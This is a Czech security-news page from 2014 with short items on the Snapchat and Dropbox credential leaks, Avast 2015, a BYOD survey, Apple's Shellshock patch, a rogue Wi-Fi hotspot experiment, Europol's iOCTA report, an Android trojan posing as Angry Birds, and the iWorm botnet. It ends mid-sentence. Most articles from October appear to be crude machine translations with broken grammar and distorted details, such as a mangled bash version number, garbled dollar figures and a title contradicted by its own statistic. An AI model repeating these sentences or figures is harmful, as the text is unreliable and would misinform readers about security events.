Je Snapchat nebezpečný?

9.11.2014 Hacking
V posledních týdnech se objevily zprávy o průnicích do systémů americké banky JP Morgan Chase, úniku fotek celebrit z Apple iCloud, krádeži více než 70 tisíc obrázků ze Snapchatu a nyní se mluví o údajném hacku Dropboxu. Otázkou tak je, zda zmíněné firmy dělají pro zabezpečení dost.

Ve většině ze zmíněných kauz nedošlo k průniku na servery dané společnosti, avšak útočníci využili techniku automatizovaného hádání hesel, zneužili aplikace třetích stran neautorizované k používání dané služby, či přihlašovací jména a hesla používaná uživateli k přihlašování na jiné webové stránky.

Tento týden na portálu Pastebin neznámý hacker oznámil, že vlastní téměř sedm milionů přihlašovacích údajů k Dropboxu. Následně bylo několik stovek z nich zveřejněno. Bezpečnostní inženýr Dropboxu Anton Nityagin však trvá na ton, že k průniku na servery této oblíbené cloudové služby nedošlo.

„Uživatelská jména a hesla ve zmíněném článku pochází k jiných služeb. Útočníci se pomocí kradených údajů pokusili přihlásit na různé stránky na internetu, včetně Dropboxu,“ uvedl Mityagin. Podobně reagovala nedávno i banka Chase s tím, že v žádném případě není nutné měnit PINy či hesla, nebo dokonce vyměňovat platební karty.

Apple trvá na tom, že jeho iCloud je bezpečný a Snapchat taktéž jakákoli pochybení na své straně odmítá. Podle expertů však společnosti nedělají k ochraně svých sítí a identifikaci nekalých aktivit dostatek.

„Poskytovatelé služeb mohou automatizované hádání hesel zablokovat. Pokud vidíte, že se někdo z jedné IP adresy pokusil stokrát připojit, měli byste to prověřit,“ uvedl profesor z College of Computer and Information Science na Northeastern University a spoluzakladatel poskytovatele bezpečnostních řešení Lastline Engin Kirda.

To, že firmy dělají pro ochranu uživatelů málo, lze demonstrovat na nedávno vydané zprávě americké FTC. Podle ní například Snapchat ukládal videa svých uživatelů na zařízení příjemce nešifrovaná mimo tzv. sandbox. To znamená, že k videím mohly přistupovat i jiné aplikace. I když podmínky užívání Snapchatu zakazují, aby aplikace třetích stran sdílely zprávy a fotografie pomocí jeho API, taková aplikace s názvem SnapSaved je dostupná již několik let.

Tato aplikace pak byla odpovědná za to, že asi 70 000 fotografií a videí ze Snapchatu bylo zveřejněno na jedné webové stránce. A jak podotýká John Kindervag ze společnosti Forrester Research, uživatelé si často rizika spojená s používáním aplikací třetích stran neuvědomují.

Podle Kindervaga stojí za nedávnou vlnou průniků především vzrůst popularity sociálních médií a špatné zabezpečení. Uživatelé by si pak měli uvědomit, že jakmile nahrají data na cloud, riziko jejich krádeže se mnohonásobně zvýší - nezávisle na tom, co tvrdí poskytovatelé cloudu.

Lidé by měli používat více hesel, která (pokud si je nepomatují), mohou ukládat do služeb typu KeePassX, jež je šifrují. Důležité je také zvolit dostatečně složité heslo. Poskytovatelům služeb pak analytici doporučují využít technik, které sledují chování jednotlivých uživatelů a pokud se tato aktivita dramaticky změní, poskytovatel by měl ihned zakročit.


Nový Avast prý jako první nabízí zabezpečení domácí sítě

9.11.2014 Zabezpečení
Novinka podle výrobce dokáže zjistit zranitelné domácí směrovače, které bývají příčinou krádeže identity a ztráty soukromí uživatelů.

Avast uvedl na trh své nejnovější bezpečnostní řešení Avast 2015 pro platformy PC i Mac OS. Všechny dostupné varianty produktu, včetně té bezplatné, nově obsahují funkci „Zabezpečení domácí sítě”, která podle tvůrců ochrání router a celou domácí síť před zákeřnými útoky hackerů.

Další funkce a vylepšení zahrnují prevenci proti DNS útokům nebo skenování protokolu HTTPS. Mimo to nový Avast nabízí oproti předchozím variantám zjednodušené uživatelské rozhraní, nižší množství reklamních sdělení a rychlejší pravidelné aktualizace zlepšující výkon a zajišťující lepší ochranu a vyšší soukromí.

„Zabezpečení domácí sítě (Home Network Security)” dovoluje jedním kliknutím otestovat domácí síť a odhalit tak potenciální bezpečnostní hrozby dřív, než je zjistí útočníci.

Jde tak identifikovat nevhodně nastavené domácí Wi-Fi sítě, routery se slabými nebo původními hesly, zranitelné routery s přístupem k internetu, kompromitované internetové připojení a povolený, avšak nechráněný protokol IPv6.

Další novinka, „Ochrana DNS (Secure DNS)”, se zaměřuje na šifrování komunikace mezi chráněným PC a zabezpečeným DNS serverem a zabraňuje tak přesměrování na podvodné webové stránky.

Novou funkcí je i „Skenování HTTPS (HTTPS Scanning)”, což je vylepšená komponenta technologie WebShield, která kontroluje i stránky zabezpečené protokolem HTTPS.

Zajímavou funkcionalitou je i „Celkový test (Smart Scan)”, který umožňuje pomocí jednoho kliknutí zkontrolovat počítač a zjistit, zda jej neohrožují škodlivé soubory, zda je potřeba aktualizovat nainstalovaný software, jestli je domácí síť zabezpečená a také odhalit potenciální příležitosti na zvýšení výkonu analyzovaného počítače.

Produkt zahrnuje i přidanou vyrovnávací paměť s asistovanou hardwarovou virtualizací, vytvářející virtuální „testovací prostředí”, ve kterém se automaticky analyzují podezřelé objekty.

Detekce PUP (Potentially Unwanted Programs neboli potenciálně nechtěných programů) identifikuje vybrané programy, které uživatel pravděpodobně nezamýšlel instalovat a nabízí mu možnost jednoduše je odstranit s cílem zrychlit výkon PC.

Avast 2015 je dostupný ve čtyřech variantách určených pro koncové uživatele – Avast Free Antivirus, Avast Pro Antivirus, Avast Internet Security a Avast Premier – a je k dispozici ve 45 jazycích. Avast Mac Security bude obsahovat funkci „Zabezpečení domácí sítě” a „Ochranu DNS” až v prvním čtvrtletí roku 2015.


Využívání mobilů ve firmách je rizikové

9.11.2014 Mobil
Největší hrozbu pro firemní data představují sami zaměstnanci – až dvě třetiny incidentů totiž díky své laxnosti zaviní právě oni. A nárůst kompromitací přes mobily se bude i dále zvyšovat.

Výsledky výroční zprávy o mobilní bezpečnosti, podle které 95 % respondentů řeší problémy se zabezpečením a podporou BYOD (Bring Your Own Device), uveřejnil Check Point Software.

Průzkum upozorňuje na přetrvávající znepokojení nad snadným pohybem citlivých podnikových informací mimo spravovaná firemní prostředí a zároveň poukazuje na nedostatečná bezpečnostní školení a riziko mobilních hrozeb v důsledku malého povědomí zaměstnanců o bezpečnosti.

„Z našeho průzkumu 2014 Mobile Security Survey jasně vyplývá, že IT odborníci neočekávají pokles mobilních bezpečnostních hrozeb a dokonce se připravují na nárůst incidentů v roce 2015,“ říká Dorit Dor, produktová viceprezidentka společnosti Check Point Software Technologies.

Klíčová zjištění podle Check Pointu:

Největší hrozba se nachází uvnitř organizace - 87 % dotázaných odborníků věří, že největší bezpečnostní hrozbou pro mobilní zařízení jsou neopatrní zaměstnanci. Téměř dvě třetiny respondentů uvedlo, že poslední velké narušení zákaznických dat bylo pravděpodobně v důsledku neopatrnosti zaměstnanců.
Mobilní zařízení v podnikových sítích – Přestože jsou neopatrní zaměstnanci nejslabším článkem mobilního zabezpečení organizací, 91 % IT profesionálů vidí v posledních dvou letech nárůst počtu osobních mobilních zařízení s přístupem do podnikové sítě. 56 % dotázaných v roce 2014 spravovalo podniková data na osobních zařízeních zaměstnanců, zatímco v roce 2013 to bylo pouze 37 %.

Očekává se nárůst počtu mobilních bezpečnostních incidentů – 82 % dotázaných bezpečnostních odborníků očekává, že počet bezpečnostních incidentů nadále poroste a rok 2015 bude rizikový. Navíc téměř všichni respondenti (98 %) vyjádřili znepokojení nad dopadem mobilních bezpečnostních incidentů, největší starosti v oblasti mobilní bezpečnosti jim dělají ztrácené a odcizené informace.

Náklady na mobilní bezpečnostní incidenty nadále rostou – V roce 2014 došlo ke zvýšení nákladů spojených s nápravou po mobilních bezpečnostních incidentech. 42 % dotázaných IT manažerů uvedlo, že mobilní bezpečnostní incidenty stojí jejich organizace více než 250 000 dolarů.

Android je i nadále vnímán jako platforma s největšími bezpečnostními riziky - V roce 2013 vnímalo Android jako platformu s nejvíce bezpečnostními riziky 49 % dotázaných, v letošním roce dokonce 64 procent - ve srovnání s Apple, Windows Mobile a Blackberry.


Apple záplaty Shellshock chybu v OS X
9.10.2014 Zranitelnosti
Apple konečně vydala aktualizaci zabezpečení pro OS X, který se zblízka kritické vzdálené spuštění kódu Shellshock chyby nalezené v prostředí GNU Bash UNIX. Tato aktualizace řeší jak CVE-2014-6271 problém objevil Stephane Chazelas, stejně jako ten, CVE-2014-7169 příznakem by Tavis Ormandymu. aktualizací zabezpečení byly pro OS X Mavericks , Mountain Lion a Lion uživatelů. Podle Ars Technica , nebude za předpokladu, že patch pro aktuální OS X Yosemite vývojář nebo veřejné beta staví, ale bude postavena do příštích ty. Pokud jste ve spěchu opravit váš systém, budete muset stáhnout aktualizaci a implementovat ručně, protože ještě nebyly zpřístupněny realizovat prostřednictvím procesu aktualizace obvykle Software (to bude pravděpodobně brzy změní). Jakmile je aktualizace byla provedena, si můžete být jisti, že byl úspěšný po otevření Terminal aplikace a spusťte následující příkaz: bash -version . vrácené informace by měly být GNU bash, verze 03.2.53 (1) -release (x86_64-apple-darwin13), pokud spustíte OS X Mavericks. Číslo v posledním řetězci by mělo být darwin12 nebo darwin11 , v závislosti na tom, zda spuštění Mountain Lion či Lion. Zatímco společnost pracuje na aktualizaci, mluvčí zdůraznil , že drtivá většina uživatelů OS X nejsou ohroženy. "S OS X systémy jsou bezpečné standardně a není vystaveno vzdálených využije bash, pokud uživatelé konfigurovat služby pokročilý UNIX," bylo uvedeno. Intego Derek Erwin napsal užitečné vysvětlení těchto dvou případech, v nichž Mac systémy uživatelů jsou ohroženy využití vady - "obou případech okraj", poznamenává, že "pravděpodobně vyžadovat úroveň odborných znalostí, které člověk konfigurace svůj účet jako takové náplasti využít poměrně jednoduše." Poznamenal také, že viděli proof-of- Koncept využívá na Mac OS X, a vysvětlil, jaké škody útočníci mohli dělat na zranitelném systému.


Lidé budou dělat něco pro Wi-Fi zdarma
9.10.2014 Bezpečnost
Nový Wi-Fi šetření provedeného v ulicích Londýna ukazuje, že spotřebitelé bezstarostně používat veřejné Wi-Fi připojení k internetu bez ohledu na jejich osobní soukromí. V experimentu, který zahrnoval vytvoření "otrávené" Wi-Fi hotspot, nic netušící uživatelé vystaveni svých internetových provozu, jejich osobní údaje, obsah jejich e-mail, a dokonce souhlasil, že pobuřující doložku zavazující, aby se vzdali svého prvorozeného dítěte výměnou za bezplatné Wi-Fi připojení k internetu. The nezávislé vyšetřování, podporou Europolu, byla provedena na účet F -Secure podle britského Cyber ​​Security Research Institute a SySS, německé Penetrační testování společnosti. Pro ​​cvičení SySS postavil přenosný Wi-Fi přístupový bod ze součástek za méně kolem 200 eur a které vyžadují trochu technické know-how. Vědci nastavit, aby přístroj do významných obchodních a politických okresů v Londýně. Oni pak se díval, jak lidé spojené, nevědomý jejich internetové aktivity byl špehuje. Ve třicet minut, 250 zařízení připojeno k hotspotu, většina z nich zřejmě automaticky, bez jejich majitel by si to uvědomovali. 33 lidé aktivně poslal internetový provoz provedením vyhledávání na webu a odesílání dat a e-mail. 32 MB dopravy byl zajat (a ihned zničena v zájmu ochrany soukromí spotřebitelů). V překvapivém zjištění, že podtrhuje nutnost šifrování, vědci zjistili, že text e-maily odeslané přes POP3 síti mohl číst, jak mohl adresy odesílatele a příjemce, a dokonce i hesla odesílatele. Za krátkou dobu, vědci představil Všeobecné obchodní podmínky (VOP) stránky, které musely být přijaty za účelem využití hotspotu. T & C zahrnoval bizarní ustanovení, která povinen uživateli, aby se vzdal svého prvorozeného dítěte nebo nejmilovanější zvířátko výměnou za bezplatné Wi-Fi připojení k internetu. Celkem šest lidí souhlasila s T & C před tím, než strana byla zakázána. Klauzule ilustrovaný nedostatek pozornosti lidí obvykle zaplatit T & C stránek, které jsou často příliš dlouho číst a těžko pochopitelné. "Všichni jsme rádi využívat bezplatné Wi-Fi připojení na internet, jak ušetřit na údaje nebo za roaming," říká Sean Sullivan, bezpečnost poradce F-Secure, který se podílel na experimentu. "Ale jako naše cvičení se ukáže, že je to příliš snadné pro každého, kdo nastavit hotspot, dát věrohodnou vypadající název a špehovat na internetové aktivity uživatelů." Pokud jde o hotspotů poskytovaných důvěryhodného zdroje, a to i ty, že jo 't bezpečné, říká. I v případě, že nejsou na starosti hotspot, mohou zločinci stále používat "cvičené" nástroje pro slídění na to, co dělají ostatní. "Problematika Wi-Fi zabezpečení je, že jsme v Evropské kyberkriminalitě Centre (EC3) při Europolu jsou velmi znepokojeni, "říká Troels Oerting, vedoucí EC3 Europolu. "Jsme upřímně podporovat činnosti, které posvítit na této každodenní rizika spotřebitelé čelit." řešení? Buď drž se dál od veřejné Wi-Fi - nebo použít Wi-Fi zabezpečení. S Wi-Fi zabezpečení připojení je neviditelný v síti Wi-Fi a vaše data z nečitelný šifrováním. Takže i když se někdo snaží, nemohou proniknout do vašich dat.


Za poznáním dnešní špičkové bezpečnostní obavy
9.10.2014 Kriminalita
Témata související s bezpečností jsou často v popředí v 24 hodin zpravodajského cyklu, ale to, co se týká Američanů nejvíce? Podle nového národního průzkumu z University of Phoenix College trestního práva a bezpečnosti, krádeží identity (70 procent) a osobní kybernetické bezpečnosti (61 procent) jsou bezpečnostní problémy největšího zájmu. Tyto obavy mohou být založen na zkušenosti, protože téměř dva-in -Pět (39 procent) utrpěli osobní narušení bezpečnosti, jako je krádež identity, neoprávněného užití informace o kreditní kartě nebo e-mailem / sociální média účtu hacking. další obavy o bezpečnost jsou: terorismus (55 procent), národní bezpečnost (54 procent), osobní bezpečnost (49 procent), okolí kriminality (47 procent), krádeže nemovitostí (44 procent) a přírodní katastrofy (44 procent). Navzdory nedávným vysokým profilem incidentů, jen 18 procent pracujících dospělých jsou znepokojeni násilí na pracovišti. Další pracovní dospělí (31 procent) jsou znepokojeni organizačních bezpečnostních otázkách, jako jsou firemní počítačové bezpečnosti, zabezpečení sítě, podvodu a korporátní špionáže. Pouze 12 procent Američanů se domnívá, obecně bezpečnější, než tomu bylo před pěti lety, zatímco 41 procent cítí stejně bezpečné a téměř polovina (47 procent) se domnívá, méně bezpečné. Nejméně polovina Američanů se více zajímají o osobní kybernetické bezpečnosti (61 procent), krádeží identity (60 procent) a národní bezpečnosti (50 procent), než tomu bylo před pěti lety.

Když přijde na pracovišti bezpečnostních otázek, pracovní dospělí jsou nejvíce přesvědčeni v schopnosti své společnosti na obrazovku nové zaměstnance, se 59 procent říká jejich zaměstnavatelé jsou zcela nebo velmi připraveni tento problém řešit. Přírodní katastrofy (35 procent), násilí na pracovišti (41 procent) a obchodní špionáž (41 procent) jsou tři bezpečnostní otázky, že pracovníci si myslí, že jejich zaměstnavatelé jsou nejméně ochotni řešit. bezpečnostní průmysl v USA je 350000000000 dolarů ročně na trh, s miliony úloh, které pokrývají téměř všechny sektory globální ekonomiky. Průmysl roste exponenciálně, vytvářet více příležitostí každý den. příležitosti a zájem v této oblasti se zdá zarovnat. Ve skutečnosti, podle průzkumu, 42 procent pracujících dospělých buď pracoval v oblasti bezpečnosti, vymáhání práva nebo v jiných oblastech v trestním řízení v souvislosti s, nebo mají nějakou úroveň zájmu o tyto profese. Více než čtvrtina (27 procent) pracujících dospělých mít nikdy pracoval v bezpečnostní oblasti, ale mají nějaký zájem na tom, s 10 procent říká, že mají zájem, a dalších 17 procent říká, že by se uvažovat. Šest procent pracovních dospělí jsou zaměstnáni v těchto oblastech nyní a 9 procent dříve pracoval v těchto oblastech. Příklady pracovních míst v bezpečnostní oblasti patří kybernetické bezpečnosti, plánování firemních bezpečnostních, prosazování práva, vnitřní bezpečnost, řízení rizik, řízení mimořádných událostí, informační bezpečnosti, opravy a soudní systém pozic. Průzkum byl proveden on-line ve Spojených státech Harris Poll jménem univerzity Phoenix u 2014 amerických dospělých (ve věku 18 +) mezi 1-5 8. 2014, z těch, 1.034ar plný / částečný úvazek nebo osoby samostatně výdělečně činné.


Správa Bezpečnostní politika hybridních cloudových prostředí
9.10.2014 Bezpečnost
Nový průzkum AlgoSec zjistil, že 79 procent organizací potřebují lepší viditelnost za účelem sjednotit správu bezpečnostní politiky v rámci svého on-premise a prostředí veřejného cloudu

Provedla v srpnu 2014 průzkum dotázaných 363 informační bezpečnosti a provozu sítě odborníků, datová centra Architekti, vlastníky aplikací a šéfové IT po celém světě. 239 respondentů (66 procent) uvedlo, že v současné době zavádění nebo plánujete nasazení podnikových aplikací na platformě IaaS během příštích 12 až 36 měsíc. následující klíčové závěry jsou založeny na těchto 239 respondentů, a zahrnují: Viditelnost je zakryta mraky - 79 procent respondentů souhlasilo nebo silně souhlasí, že je třeba lepší viditelnost napříč on-premise datových center a veřejných cloudů. . Dvě třetiny (66 procent) respondentů souhlasilo nebo silně se shodli, že je obtížné rozšířit firemní bezpečnostní politiky sítě do veřejného cloudu Nedostatek procesů brání řízení cloud a soulad - 59 procent respondentů konstatoval nedostatek provozních pracovních postupů pro správu zabezpečení sítě v hybridním prostředí. Prokazování shody na IaaS srovnání s on-premise datových center byla dalším velkým problémem, se 49 procent dotázaných tvrdí, těžko. různorodých výběr bezpečnostních kontrol používaných v rámci IaaS - Pouze třetina respondentů (33 procent) využívají obchodní sítě firewall pro ochranu přístupu jejich dat v cloudu. 25 procent respondentů pomocí ovládacích prvků pro zprostředkovatele, jako je Amazon bezpečnostní skupiny a 10 procent používá Hostitelské brány firewall. Firmy jsou ve tmě o bezpečnostních kontrol v cloudu - Je znepokojující, že třetina firem, které plánují nasazení podnikových aplikací v cloudu . během příštích 12-24 měsíce nevím, jaké nástroje budou využívat ke správě svých politik zabezpečení sítě v oblaku dat a zabezpečení sítě jsou nejvíce náročné funkce, které se stěhují do veřejných cloudů - Zabezpečení sítě je druhý nejvíce komplexní funkce pro migraci . se veřejného cloudu (po bezpečnosti dat), a nejsložitější pro malé a středně velké organizace, Odpovědnost za cloud bezpečnosti je roztříštěný - na malé a středně velké firmy, zabezpečení pro podnikové aplikace běžící na veřejných cloudů je řešena převážně IT Operations ( 70 procent). V budoucnu, firmy plánují přejít tuto odpovědnost se k informační bezpečnosti. U velkých podniků, odpovědnost je a zůstane v rukou informační bezpečnost (72 procent).


Crime-as-a-Service obchodní model
9.10.2014 Cloud
Služby založené na trestní vyvíjí průmysl, ve kterém specialisté ve virtuální podzemní ekonomiky vyvíjet produkty a služby, pro použití v jiných zločinců. Tento zločin-as-a-Service obchodní model pohání inovace a kultivovanost, a nabízí přístup k široké škále služeb, které umožňují téměř jakýkoliv typ počítačové trestné činnosti.

Nová iOCTA Zpráva zdůrazňuje, že v důsledku toho, překážky vstupu do počítačové trestné činnosti jsou sníženy, což těm, kterým chybí technické znalosti - včetně tradičních skupin organizovaného zločinu -. se pustit do počítačové trestné činnosti tím, že koupí dovednosti a nástroje, které chybí Kyberzločinci také zneužívají legitimní služby a nástroje, jako je anonymizace, šifrování a virtuální měny. Zpráva upozorňuje na zneužívání Darknets, které se používají zločinci pro nedovolenou on-line obchodu s drogami, zbraněmi, ukradené zboží, ukradených dat osobní a platebních karet, kované doklady totožnosti a materiální zneužívání dětí. Tato "skrytá internet" se stala hlavní hnací silou ve vývoji počítačové kriminality a představuje velmi složitý úkol pro vymáhání práva. Přidání složitosti dynamického boj proti kyberkriminalitě obrázku 2014 iOCTA zdůrazňuje, že zločinci převážně v provozu od jurisdikce mimo EU , která v kombinaci s zastaralých právních nástrojů a nedostatečné odpovědi kapacit, jim umožňuje pracovat s minimálním rizikem. "neodmyslitelně nadnárodní charakter počítačové kriminality, s jeho rostoucí komercializace a sofistikovanosti útočných kapacit, je hlavním trendem je uvedeno v iOCTA. To znamená, že otázky týkající se přiznání, zneužívání legálních služeb a nedostatečné nebo nejednotné právní předpisy, patří mezi nejdůležitějších výzev, kterým čelí prosazování práva dnes, "říká Rob Wainwright, ředitel Europolu. obavy pana Wainwright jsou sdílená komisař vnitra: "To dny, téměř každý se může stát kybernetické zločince. To klade stále větší tlak na orgány činnými v trestním držet krok. Musíme využít naší nové poznatky o tom, jak organizovaný zločin funguje on-line, aby zahájila další nadnárodní operace. Musíme zajistit, aby vyšetřování podvodů s platebními kartami a on-line zneužívání dětí se nezastaví na hranicích jednotlivých států, "říká Cecilia Malmströmová, komisařka vnitřní věci." 2014 iOCTA přináší řadu doporučení pro vymáhání práva, aby se úspěšně řešit vyvíjí a trans -Národní charakter počítačové kriminality v rozmanité a pružně. Zvyšování povědomí, budování kapacit, standardizace postupů a postupů, mezinárodní a přeshraniční spolupráce, výměna příslušných informací a poznatků, rozvoj vhodných a harmonizovaných právních předpisů, a demontáže a narušení trestního infrastruktury stojí za nezákonných on-line služeb on-line, jsou mezi nimi návrhy. Zpráva také poukazuje na významnou úlohu, kterou EC3 Europolu může hrát v boji proti počítačové trestné činnosti tím, že poskytuje platformu pro výměnu informací a poznatků, jako zdroj technických a taktických znalostí a tím, že poskytuje podporu a koordinaci potřebnou pro spoje , multi-národní operace, které moderní počítačové trestné činnosti vyšetřování poptávka. 2014 iOCTA je vlajkovou lodí strategický produkt EC3 je. Zpráva informuje rozhodovací pravomocí na politiky, strategické a taktické úrovni o probíhající vývoj a objevující se hrozby v oblasti počítačové kriminality, které ovlivňují vlády, podniky a občany v EU. Tato zpráva přispěje ke stanovení priorit v rámci politického cyklu EU proti závažné organizované trestné činnosti, pro akční plán Operačního pro 2015 ve tři počítačové kriminality podoblastí: kybernetické útoky, on-line pohlavnímu vykořisťování dětí a proti podvodům. Těží ze své centrální poloze v podpoře prosazování právních předpisů EU v oblasti boje proti počítačové kriminalitě, EC3 Europol založila iOCTA z příspěvků členských států, a odborné znalosti věcně z EC3 a ostatními odděleními Europolu. Práce byla dále posílena s přispěním soukromého sektoru a akademické sféry.


Seagate Surveillance HDD nabízí odtahové služby
9.10.2014 Hardware
Seagate vydala specializované monitorovací HDD Seagate představovat záchranných služeb. Navrženo speciálně pro dozor a video analytických aplikací, Surveillance HDD je disk, který používá služby pro obnovu dat, jejichž cílem je obnovit data z zlomyslnosti nebo náhodné selhání, udržet systémy v oblasti delší dobu a snížit náklady na poštovní nasazení.

Rychlý a snadný proces obnovy, Seagate Záchranné služby lze obvykle obnovit data do dvou týdnů v závislosti na typu vymáhání, se až do více než 90 procent úspěšnosti v záchraně dat. aktivována v okamžiku nákupu, záchranný plán stanoví tři roky obnovy dat na zlomek toho, co by stálo obnovení dat ztracených v důsledku cokoli od počítačových virů na přírodní katastrofy a další. "Více než 50 procent uživatelů, kteří měli nehodu s jejich úsilí zažili ztrátu dat," řekl Balaji Thangaraj, viceprezident pro výzkum v Boston Analytics. "Seagate Surveillance HDD Seagate se záchrannými službami, nabízí spotřebitelům a systémové integrátory podobně s kritickým spolehlivost, kterou očekávají v jednoduché, cenově dostupné řešení, které jim umožní získat jistotu, že jejich obsah je chráněn." sedmé generace optimalizované sledování HDD, pohon nyní expanduje kapacitou až 6 TB a je možné uložit až 600 hodin HD obsahu dělat to nejvyšší kapacita disku v oboru, navržený speciálně pro bezpečnostní aplikace. Navrženy tak, aby měřítko ukládání videa, disk obsahuje také možnosti pro rotační vibrace (RV), senzory, které umožňují, aby spolehlivě provádět v systémech s až 16 disků, takže je ideální pro malé až střední podniky, které obvykle nemají IT podporu, ale pokud se skladuje volně ložený pro HD video a zálohování jsou velmi ceněny. určen na podporu nahrávky dohledu z několika kamer, bez ohledu na jejich požadavky rozlišení Surveillance HDD podporuje až 32 kanálů a snadno zvládá vyšší zátěže zápisu vyžadované sledovacích systémů. Pohon podporuje velké streaming zátěže po delší čas schůzky průmyslu archivních a rozlišením požadavků. Tyto vlastnosti, spolu s volitelnými R / V senzorů a záchranné služby Seagate, zvýšit výkon jednotky v multi-pohonů a systémů RAID a zvyšovat hodnotu dohledu Údaje podle přináší nejvyšší integritu dat možné. Chlouba špičková spolehlivost Kontrolní HDD má 1000000hodina MTBF (střední doba mezi poruchami), který umožňuje, aby byl výrobek uchováván v oboru déle a zároveň snížit náklady na nasazení v terénu a udržování udržení zákazníků. Pohon je také navržen pro nízkou spotřebu energie a emise tepla umožňuje poskytovatelům řešení, větší flexibilitu návrhu.


Destruktivní Android Trojan se vydává za nejnovější Angry Birds hry
8.10.2014 Mobil
Android malware maskující se jako legitimní aplikace nebo hry nabízené na on-line obchodech s aplikacemi není vzácný výskyt, ale záměrně destruktivní malware, který nežádá o výkupné je. Dr. Web vědci nedávno analyzovali nový Android Trojan, který spadá do kategorie říkají "nárazuvzdorných programů." detekován jako Android.Elite.1.origin, Trojan se vydává za hru, která kombinuje Rovio je populární angry birds a Hasbro Transformers povolení a která má být uvolněna později v tomto měsíci. Tvůrci malwaru se zdá, že používá grafické prvky z herní oficiálních stránkách , aby aplikace se zdá legitimní.

Jakmile je falešný aplikace je spuštěn, požádá uživatele, aby měla přístup k administrativním funkcím periferií - zdánlivě fungovat, jak by měl, ale ve skutečnosti, aby bylo možné provést následující destruktivní a ničivé akce:
Formátování SD karty v zařízení, a tudíž odstranit veškerý obsah na něm
Blokování přístupu k WhatsApp Messenger, Facebook, setkáních a standardní Android SMS aplikace tím, že ukazuje grafiku obsahující logo Android vybavený Guy Fawkes masku a zbraň, a zpráva "poslouchat nebo byl roztrhán."
"Pro další překážkou využití mobilních komunikačních nástrojů, malware skryje všechny notifikace o nových příchozích SMS. Zároveň obdržela zprávy jsou uloženy ve složce Doručená pošta, která je ve skutečnosti k dispozici, protože přístup k poslovi je zablokována" vědci vysvětlil . Konečně, SMS zpráva říká: "Elite má hacknutý vás. Poslechni, nebo musí být hacknutý" je poslán ke každému kontaktu v adresáři přístroje a každé platné telefonní číslo, ze kterého je SMS přijata. Tyto zprávy jsou posílány opakovaně ke všem těmto číslům každý pět sekund, takže mobilní účet spojený s ohrožena zařízení může být vyčerpány během několika minut nebo dokonce sekund, vědci varovali. Bohužel, to není známo, jak Trojan se šíří. Ověřil jsem si oficiální app obchody Apple a Google, a není tam žádné znamení to (dobře, ne v této současné inkarnaci). Výzkumy dostal malware vzorek z veřejné služby on-line. Je možné, že aplikace je k dispozici ke stažení na třetí strany on-line obchodů s aplikacemi, ale může také být propagován prostřednictvím nevyžádané pošty. Druhá metoda se zdá být pravděpodobné, že v případě, že malware tvůrci chtěli zasáhnout konkrétní cíle. V každém případě je to vždy dobrý nápad, být opatrní při stahování a instalaci software na vašem mobilním zařízení. Držte se renomovaných obchodech, zkontrolujte, zda je vydavatel aplikace je ten správný, je kritický oprávnění aplikace ptá, a být obzvláště opatrní při stahování aplikací velmi populární, protože jejich pověst a popularita je často zneužívána malware vývojáři. A pokud máte spamovou zprávu nebo zprávu od přítele, neinstalujte propojené aplikace slepě, aniž by nejprve ověřit, zda je to škodlivé.


Apple aktualizuje XProtect zabít iWorm botnet ohrožení
8.10.2014 BotNet
Apple vydala aktualizaci pro svůj XProtect anti-malware systém, který dělá to rozpoznat tři různé verze iWorm OS backdoor malwaru objevil minulý týden AV specialisty Dr. Web. malware lana infikovaných počítačů do "V současné době spící" botnet, a dostal IP adresu C & C serverů, ke kterému byl ment hlásit z Reddit příspěvky. Je schopný dělat mnoho věcí, a mezi nimi se stahování další (škodlivé) souborů a provádění pokynů systému. Výzkumníci nebyli schopni zjistit, jak se malware se šíří, ale říkal, že to rozhodně není self-replikace. Několik dní později, Thomas Reed The Safe Mac byl upozorňován anonymního zdroje, že malware se šíří přes montéry, kteří přicházejí s pirátských verzí populárních aplikací nabízených na Pirate Bay. Zdá se, že instalační požaduje - a byla jim poskytnuta -. oprávnění správce mu odhlásila tvrzení, zjistil, že je to pravda, a předložila tento tip a své poznatky o bezpečnostní produkt týmu společnosti Apple. Apple vydala aktualizaci XProtect zabývající se problematikou v sobotu, a obsahuje definice pro tři různé varianty malwaru. Uživatelé Nemusíte se starat o provádění aktualizací, protože jejich počítače zkontrolovat aktualizace XProtect na denní bázi, a automaticky je realizovat.


Každý pátý Android uživatel čelí kybernetickým útokům
8.10.2014 Mobil
Celkem 1.000.000 uživatele Android zařízení po celém světě, se setkal nebezpečného softwaru mezi srpnem 2013 a červencem 2014, podle výsledků průzkumu provedeného společností Kaspersky Lab a Interpolu. Ve skutečnosti, toto období bylo vrcholem kybernetických útoků registrovaných v uplynulých letech. Nejoblíbenější škodlivé programy jsou SMS trojské koně, které odesílají zprávy na čísla se zvýšenou sazbou bez vědomí majitele.

Uživatelé v Rusku, Indii, Kazachstánu, Vietnamu, Ukrajiny a Německa patří mezi hlavní cíle pro kybernetických útoků na Android. Většinou je to proto, že lidé v těchto zemích často platí pro obsah a služby on-line přes SMS; Pro zločinci to je atraktivní způsob, jak zpeněžit škodlivým útokům, protože mohou využívat tyto služby rychle a anonymně převést peníze z mobilních předplacených účtů na bankovních účtů třetích osob. Hlavním důvodem pro zvýšení počtu útoků a zaútočil uživatelů bylo Použití rodinných programů Trojan-SMS. Ty tvořily 57,08% všech detekcí provedených bezpečnostních řešení společnosti Kaspersky Lab pro zařízení se systémem Android. Druhý přišel RiskTool (21,52% pozitivů), podmíněně legitimní programy, které však mohou být použity k nekalým účelům (posílání SMS oznámení o placené zprávy, přenos geo-dat). Aplikace s agresivní reklamy (pop-up okna, oznámení ve stavovém řádku, atd), byly na třetím místě (7,37%). "Často slyšíme, odborníci říkají, že Android mají uživatelé čeho bát, že i když nebezpečné programy pro tento systém vypadat pravidelně, počet útoků není významný Až do nedávné doby, které by mohly být považovány za spravedlivé komentář se však situace dramaticky změnila za poslední rok -.., a ne k lepšímu, "řekl Roman Unuchek, senior analytik společnosti Kaspersky virus Lab. však nelze vyvodit závěr, že se hrozeb pro zařízení se systémem Android byl v průběhu vykazovaného období úplně pesimistický. V dubnu 2014 odborníky společnosti Kaspersky Lab zaznamenala významný pokles celkového počtu útoků, které se staly, a to především díky výrazným poklesem počtu Trojan-SMS bránu. To může být důsledkem nových pravidel pro služby placené přes SMS představil telekomunikačního regulačního Ruska. Nyní jsou všechny ruské subjekty musí být zaslána potvrzovací zpráva z jakéhokoliv účastníka, který se snaží platit za služby prostřednictvím SMS. Od července 2014 počet útoků začala zvyšuje ještě jednou, je možné, že nová právní úprava přispěla k poklesu v dubnu, nepřímo potvrzuje účinnost právních předpisů proti počítačové proti podvodům. "Interpol a 